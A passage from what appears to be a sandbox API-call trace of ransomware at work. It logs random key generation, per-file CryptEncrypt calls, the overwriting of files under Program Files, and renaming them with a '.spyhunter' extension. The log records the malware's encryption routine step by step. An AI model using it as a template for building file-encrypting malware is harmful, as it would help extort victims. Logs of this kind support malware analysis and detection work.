hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa30 | out: pbBuffer=0x57fa30) returned 1 [0113.119] GetProcessHeap () returned 0x2c0000 [0113.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0113.119] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa28*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa28*=0x30) returned 1 [0113.119] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Runtime.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.workflow.runtime.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.119] GetProcessHeap () returned 0x2c0000 [0113.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0113.120] GetProcessHeap () returned 0x2c0000 [0113.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c300 | out: hHeap=0x2c0000) returned 1 [0113.120] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa30 | out: pbBuffer=0x57fa30) returned 1 [0113.120] GetProcessHeap () returned 0x2c0000 [0113.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0113.121] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa28*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa28*=0x30) returned 1 [0113.121] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.ComponentModel.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.workflow.componentmodel.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.121] GetProcessHeap () returned 0x2c0000 [0113.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0113.121] GetProcessHeap () returned 0x2c0000 [0113.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de9e48 | out: hHeap=0x2c0000) returned 1 [0113.121] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa28 | out: pbBuffer=0x57fa28) returned 1 [0113.122] GetProcessHeap () returned 0x2c0000 [0113.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0113.122] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa20*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa20*=0x30) returned 1 [0113.122] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Activities.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.workflow.activities.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.122] GetProcessHeap () returned 0x2c0000 [0113.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0113.122] GetProcessHeap () returned 0x2c0000 [0113.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de9d30 | out: hHeap=0x2c0000) returned 1 [0113.122] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa28 | out: pbBuffer=0x57fa28) returned 1 [0113.122] GetProcessHeap () returned 0x2c0000 [0113.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0113.122] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa20*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa20*=0x30) returned 1 [0113.122] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Speech.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.speech.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.123] GetProcessHeap () returned 0x2c0000 [0113.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0113.123] GetProcessHeap () returned 0x2c0000 [0113.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc4a60 | out: hHeap=0x2c0000) returned 1 [0113.123] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa20 | out: pbBuffer=0x57fa20) returned 1 [0113.123] GetProcessHeap () returned 0x2c0000 [0113.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0113.123] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa18*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa18*=0x30) returned 1 [0113.123] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.ServiceModel.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.servicemodel.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.123] GetProcessHeap () returned 0x2c0000 [0113.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0113.123] GetProcessHeap () returned 0x2c0000 [0113.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35d160 | out: hHeap=0x2c0000) returned 1 [0113.123] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa20 | out: pbBuffer=0x57fa20) returned 1 [0113.123] GetProcessHeap () returned 0x2c0000 [0113.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0113.124] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa18*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa18*=0x30) returned 1 [0113.124] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Runtime.Serialization.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.runtime.serialization.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.124] GetProcessHeap () returned 0x2c0000 [0113.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0113.124] GetProcessHeap () returned 0x2c0000 [0113.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de9c18 | out: hHeap=0x2c0000) returned 1 [0113.124] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa18 | out: pbBuffer=0x57fa18) returned 1 [0113.124] GetProcessHeap () returned 0x2c0000 [0113.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0113.125] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa10*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa10*=0x30) returned 1 [0113.125] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Printing.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.printing.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.125] GetProcessHeap () returned 0x2c0000 [0113.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0113.125] GetProcessHeap () returned 0x2c0000 [0113.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc4968 | out: hHeap=0x2c0000) returned 1 [0113.125] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa18 | out: pbBuffer=0x57fa18) returned 1 [0113.125] GetProcessHeap () returned 0x2c0000 [0113.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0113.125] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa10*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa10*=0x30) returned 1 [0113.125] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IO.Log.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.io.log.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.125] GetProcessHeap () returned 0x2c0000 [0113.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0113.125] GetProcessHeap () returned 0x2c0000 [0113.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc4870 | out: hHeap=0x2c0000) returned 1 [0113.128] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa10 | out: pbBuffer=0x57fa10) returned 1 [0113.128] GetProcessHeap () returned 0x2c0000 [0113.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0113.128] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa08*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa08*=0x30) returned 1 [0113.128] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.Selectors.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.identitymodel.selectors.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.128] GetProcessHeap () returned 0x2c0000 [0113.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0113.128] GetProcessHeap () returned 0x2c0000 [0113.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de9b00 | out: hHeap=0x2c0000) returned 1 [0113.129] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa10 | out: pbBuffer=0x57fa10) returned 1 [0113.129] GetProcessHeap () returned 0x2c0000 [0113.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0113.129] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa08*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa08*=0x30) returned 1 [0113.129] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\system.identitymodel.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.130] GetProcessHeap () returned 0x2c0000 [0113.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0113.130] GetProcessHeap () returned 0x2c0000 [0113.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35d060 | out: hHeap=0x2c0000) returned 1 [0113.131] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa08 | out: pbBuffer=0x57fa08) returned 1 [0113.131] GetProcessHeap () returned 0x2c0000 [0113.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0113.132] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa00*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa00*=0x30) returned 1 [0113.132] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\redistlist\\frameworklist.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0113.132] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml") returned 95 [0113.132] StrStrW (lpFirst="FrameworkList.xml", lpSrch=".txt") returned 0x0 [0113.133] GetProcessHeap () returned 0x2c0000 [0113.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0113.133] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f9c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f9c4*=0x1bd4, lpOverlapped=0x0) returned 1 [0113.153] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe42c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0113.153] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1bd4, lpNumberOfBytesWritten=0x57f9c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f9c4*=0x1bd4, lpOverlapped=0x0) returned 1 [0113.153] GetProcessHeap () returned 0x2c0000 [0113.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0113.153] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.153] WriteFile (in: hFile=0x158, lpBuffer=0x57fa04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f9c4, lpOverlapped=0x0 | out: lpBuffer=0x57fa04*, lpNumberOfBytesWritten=0x57f9c4*=0x4, lpOverlapped=0x0) returned 1 [0113.154] WriteFile (in: hFile=0x158, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f9c4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57f9c4*=0x30, lpOverlapped=0x0) returned 1 [0113.154] CloseHandle (hObject=0x158) returned 1 [0113.154] GetProcessHeap () returned 0x2c0000 [0113.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0113.154] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml.spyhunter") returned 105 [0113.154] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\redistlist\\frameworklist.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml.spyhunter" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\redistlist\\frameworklist.xml.spyhunter")) returned 1 [0113.155] GetProcessHeap () returned 0x2c0000 [0113.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0113.155] GetProcessHeap () returned 0x2c0000 [0113.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0113.155] GetProcessHeap () returned 0x2c0000 [0113.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b9f58 | out: hHeap=0x2c0000) returned 1 [0113.155] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa00 | out: pbBuffer=0x57fa00) returned 1 [0113.155] GetProcessHeap () returned 0x2c0000 [0113.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0113.155] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f9f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f9f8*=0x30) returned 1 [0113.155] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MpAsDesc.dll" (normalized: "c:\\program files\\windows defender\\mpasdesc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.155] GetProcessHeap () returned 0x2c0000 [0113.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0113.155] GetProcessHeap () returned 0x2c0000 [0113.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20230 | out: hHeap=0x2c0000) returned 1 [0113.157] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f9f8 | out: pbBuffer=0x57f9f8) returned 1 [0113.157] GetProcessHeap () returned 0x2c0000 [0113.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0113.157] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f9f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f9f0*=0x30) returned 1 [0113.157] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MsMpRes.dll.mui" (normalized: "c:\\program files\\windows defender\\en-us\\msmpres.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.159] GetProcessHeap () returned 0x2c0000 [0113.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0113.159] GetProcessHeap () returned 0x2c0000 [0113.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de2428 | out: hHeap=0x2c0000) returned 1 [0113.159] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f9f8 | out: pbBuffer=0x57f9f8) returned 1 [0113.159] GetProcessHeap () returned 0x2c0000 [0113.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0113.160] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f9f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f9f0*=0x30) returned 1 [0113.160] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MpEvMsg.dll.mui" (normalized: "c:\\program files\\windows defender\\en-us\\mpevmsg.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.160] GetProcessHeap () returned 0x2c0000 [0113.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0113.160] GetProcessHeap () returned 0x2c0000 [0113.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de2368 | out: hHeap=0x2c0000) returned 1 [0113.160] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f9f0 | out: pbBuffer=0x57f9f0) returned 1 [0113.160] GetProcessHeap () returned 0x2c0000 [0113.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0113.160] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f9e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f9e8*=0x30) returned 1 [0113.160] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\en-US\\MpAsDesc.dll.mui" (normalized: "c:\\program files\\windows defender\\en-us\\mpasdesc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.160] GetProcessHeap () returned 0x2c0000 [0113.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0113.160] GetProcessHeap () returned 0x2c0000 [0113.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe688 | out: hHeap=0x2c0000) returned 1 [0113.162] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f9e8 | out: pbBuffer=0x57f9e8) returned 1 [0113.162] GetProcessHeap () returned 0x2c0000 [0113.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0113.162] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f9e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f9e0*=0x30) returned 1 [0113.162] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Uninstall Information\\.." (normalized: "c:\\program files"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.163] GetProcessHeap () returned 0x2c0000 [0113.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0113.163] GetProcessHeap () returned 0x2c0000 [0113.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d150 | out: hHeap=0x2c0000) returned 1 [0113.163] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f9e8 | out: pbBuffer=0x57f9e8) returned 1 [0113.163] GetProcessHeap () returned 0x2c0000 [0113.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0113.163] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f9e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f9e0*=0x30) returned 1 [0113.163] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Uninstall Information\\." (normalized: "c:\\program files\\uninstall information\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.163] GetProcessHeap () returned 0x2c0000 [0113.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0113.163] GetProcessHeap () returned 0x2c0000 [0113.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d0a8 | out: hHeap=0x2c0000) returned 1 [0113.191] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f9e0 | out: pbBuffer=0x57f9e0) returned 1 [0113.191] GetProcessHeap () returned 0x2c0000 [0113.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0113.191] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f9d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f9d8*=0x30) returned 1 [0113.191] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.addin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.194] GetProcessHeap () returned 0x2c0000 [0113.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0113.194] GetProcessHeap () returned 0x2c0000 [0113.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2e910 | out: hHeap=0x2c0000) returned 1 [0113.211] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f9c8 | out: pbBuffer=0x57f9c8) returned 1 [0113.211] GetProcessHeap () returned 0x2c0000 [0113.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0113.211] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f9c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f9c0*=0x30) returned 1 [0113.211] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\SynchronizationEula.rtf" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\documentation\\1033\\license agreements\\synchronizationeula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0113.212] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\SynchronizationEula.rtf") returned 112 [0113.212] StrStrW (lpFirst="SynchronizationEula.rtf", lpSrch=".txt") returned 0x0 [0113.212] GetProcessHeap () returned 0x2c0000 [0113.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0113.212] ReadFile (in: hFile=0xcc, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f984, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f984*=0x2800, lpOverlapped=0x0) returned 1 [0113.242] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0113.242] WriteFile (in: hFile=0xcc, 